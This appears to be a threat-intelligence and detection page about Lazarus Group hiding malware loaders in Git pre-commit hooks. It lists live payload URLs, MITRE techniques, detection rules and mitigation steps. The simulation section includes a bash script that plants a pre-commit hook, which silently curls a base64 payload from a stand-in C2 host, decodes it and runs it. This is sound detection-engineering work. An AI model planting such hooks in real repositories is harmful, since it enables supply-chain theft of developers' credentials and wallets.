Lazarus Group Uses Git Hooks To Hide Malware DPRK’s Contagious Interview and TaskJacker campaign is now hiding its second‑stage loader inside git hooks that download InvisibleFerret and Beavertail malware
Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The North Korean Lazarus Group has updated its Contagious Interview and TaskJacker campaign by embedding a second-stage delivery mechanism inside malicious Git pre-commit and post-checkout hooks. These hooks silently retrieve platform-specific payloads from a Vercel-hosted URL and execute them across macOS, Linux, and Windows systems. By abusing trusted developer workflows and repository tooling, the attackers turn routine coding tasks into a supply-chain compromise vector that can lead to credential theft and cryptocurrency wallet compromise. Key indicators include the malicious .githooks/pre-commit script and infrastructure hosted at precommit.vercel.app.
Investigation
OpenSourceMalware researchers identified a compact .githooks/pre-commit script that detects the victim’s operating system and downloads the appropriate payload from precommit.vercel.app using curl or wget. The same script hash appeared across multiple GitHub repositories disguised as coding-assessment projects tied to crypto and DeFi themes. The infrastructure served different shell or batch payloads depending on the operating system, controlled through a flag-based query parameter. Researchers also shared GitHub code search queries that can be used to reproduce the hunt and locate similar repositories.
Mitigation
Organizations should review Git repository hooks carefully, especially files under .githooks, .husky, and .vscode/tasks.json, before allowing them to run. Developers should clone and test untrusted repositories only in isolated environments that do not contain SSH keys, wallet files, or active browser profiles. Automatic execution of Git hooks should be disabled where possible or limited to approved scripts. Security teams should also monitor outbound traffic to precommit.vercel.app and similar domains that may support malicious payload delivery.
Response
Defenders should block network communication with precommit.vercel.app and create file integrity monitoring for unexpected .githooks/pre-commit files. Alerts should also be triggered when curl or wget is executed from Git hook-related processes. Any potentially exposed credentials, tokens, or cryptocurrency wallets should be investigated and rotated immediately. Threat hunting should be expanded using the provided indicators to identify affected repositories and any systems that interacted with them.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef tool fill:#c2e0ff classDef artifact fill:#e6e6e6 classDef action fill:#ffd9b3 %% Nodes u2013 Actions action_clone["<b>Action</b> – Victim clones malicious repository<br/><b>Description</b>: Downloads code containing a malicious Git hook."] class action_clone action action_commit["<b>Action</b> – Victim runs <code>git commit</code><br/><b>Description</b>: Triggers the preu2011commit hook automatically."] class action_commit action %% Nodes u2013 Artifacts artifact_repo["<b>Artifact</b> – Malicious Git repository<br/><b>Details</b>: Provides fake codingu2011assessment interview material."] class artifact_repo artifact artifact_hook["<b>Artifact</b> – .githooks/preu2011commit script<br/><b>Details</b>: Executed automatically on each <code>git commit</code>."] class artifact_hook artifact artifact_urls["<b>Artifact</b> – Remote payload URLs<br/><b>Details</b>: https://precommit.vercel.app/settings/mac?flag=5<br/>https://precommit.vercel.app/settings/linux?flag=5<br/>https://precommit.vercel.app/settings/windows?flag=5"] class artifact_urls artifact %% Nodes u2013 Techniques tech_supply_chain["<b>Technique</b> – T1195: Supply Chain Compromise<br/><b>Description</b>: Adversaries compromise a thirdu2011party software supply chain to distribute malicious code to victims."] class tech_supply_chain technique tech_dependency["<b>Technique</b> – T1195.001: Compromise Software Dependencies and Development Tools<br/><b>Description</b>: Target software dependencies or development tools to embed malicious code."] class tech_dependency technique tech_proxy_exec["<b>Technique</b> – T1127: Trusted Developer Utilities Proxy Execution<br/><b>Description</b>: Use trusted developer utilities (e.g., Git hooks) to execute attackeru2011controlled code."] class tech_proxy_exec technique tech_unix_shell["<b>Technique</b> – T1059.004: Command and Scripting Interpreter u2013 Unix Shell<br/><b>Description</b>: Execute commands via a Unix shell interpreter."] class tech_unix_shell technique tech_user_exec["<b>Technique</b> – T1204.004: User Execution u2013 Malicious Copy and Paste<br/><b>Description</b>: Victim runs malicious code unintentionally through copyu2011andu2011paste actions."] class tech_user_exec technique tech_taint["<b>Technique</b> – T1080: Taint Shared Content<br/><b>Description</b>: Embed malicious content in shared resources that are later executed by victims."] class tech_taint technique tech_content_injection["<b>Technique</b> – T1659: Content Injection<br/><b>Description</b>: Insert malicious content into legitimate files or data streams."] class tech_content_injection technique %% Nodes u2013 Tools tool_git["<b>Tool</b> – Git<br/><b>Description</b>: Versionu2011control system that runs hook scripts on repository events."] class tool_git tool tool_curl["<b>Tool</b> – curl / wget<br/><b>Description</b>: Downloads remote content over HTTP/HTTPS."] class tool_curl tool tool_sh["<b>Tool</b> – /bin/sh<br/><b>Description</b>: Shell interpreter used to run downloaded payloads."] class tool_sh tool %% Connections u2013 Attack Flow action_clone –>|delivers| artifact_repo artifact_repo –>|enables| tech_supply_chain tech_supply_chain –>|facilitates| tech_dependency tech_dependency –>|places| artifact_hook action_commit –>|triggers| artifact_hook artifact_hook –>|leverages| tech_proxy_exec tech_proxy_exec –>|executes via| tool_git tool_git –>|invokes| tech_unix_shell tech_unix_shell –>|uses| tool_curl tool_curl –>|downloads| artifact_urls artifact_urls –>|supplies to| tech_taint tech_taint –>|leads to| tech_content_injection tech_content_injection –>|executes via| tool_sh tool_sh –>|runs malicious payload| tech_user_exec "
Attack Flow
Detections
Suspicious CURL Usage (via cmdline)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via proxy)
View
Possible Data Infiltration / Exfiltration / C2 via Third Party Services / Tools (via dns)
View
Suspicious Curl Execution Attempt [MacOS] (via cmdline)
View
Remote File Upload / Download via Standard Tools (via cmdline)
View
IOCs (HashSha1) to detect: Lazarus Group Uses Git Hooks To Hide Malware DPRK's Contagious Interview and TaskJacker campaign is now hiding its second‐stage loader inside git hooks that download InvisibleFerret and Beavertail malware
View
Detection of Malicious Pre-Commit Hook in Git with Curl Command [Windows Process Creation]
View
Suspicious Pre-Commit Hook Activity Downloading Shell Script Payloads [Linux Process Creation]
View
Lazarus Group Malicious Loader in Git Hooks [Linux File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An operator from the Lazarus Group compromises a developer’s workstation and injects a malicious Git pre‑commit hook. The hook is placed in a hidden “.githooks” directory to avoid casual discovery. When anygit commitis performed, the hook silently contacts a C2 server, downloads a base64‑encoded payload, writes it to/tmp/.payload, makes it executable, and runs it, thereby establishing a foothold (T1620) and executing an embedded malicious payload (T1027.009). -
Regression Test Script:
#!/bin/bash # ------------------------------------------------- # Lazarus‑style malicious Git pre‑commit hook test # ------------------------------------------------- # 1. Create hidden .githooks directory mkdir -p "$HOME/.githooks" # 2. Write malicious pre‑commit hook cat > "$HOME/.githooks/pre-commit" <<'EOF' #!/bin/bash # Malicious pre‑commit hook – downloads and executes payload C2_URL="http://malicious.example.com/payload.b64" TMPFILE="/tmp/.payload" # Download base64 payload curl -s -o "$TMPFILE.b64" "$C2_URL" # Decode and set executable base64 -d "$TMPFILE.b64" > "$TMPFILE" chmod +x "$TMPFILE" # Execute payload silently "$TMPFILE" & exit 0 EOF # 3. Make the hook executable chmod +x "$HOME/.githooks/pre-commit" # 4. Simulate a git commit to fire the hook mkdir -p "$HOME/malicious-repo" cd "$HOME/malicious-repo" git init > /dev/null 2>&1 touch README.md git add README.md git commit -m "Initial commit" > /dev/null 2>&1 echo "Malicious pre‑commit hook executed (if detection works, an alert should appear)." -
Cleanup Commands:
#!/bin/bash # Remove malicious artifacts rm -rf "$HOME/.githooks" rm -f "/tmp/.payload" "/tmp/.payload.b64" rm -rf "$HOME/malicious-repo" echo "Cleanup complete."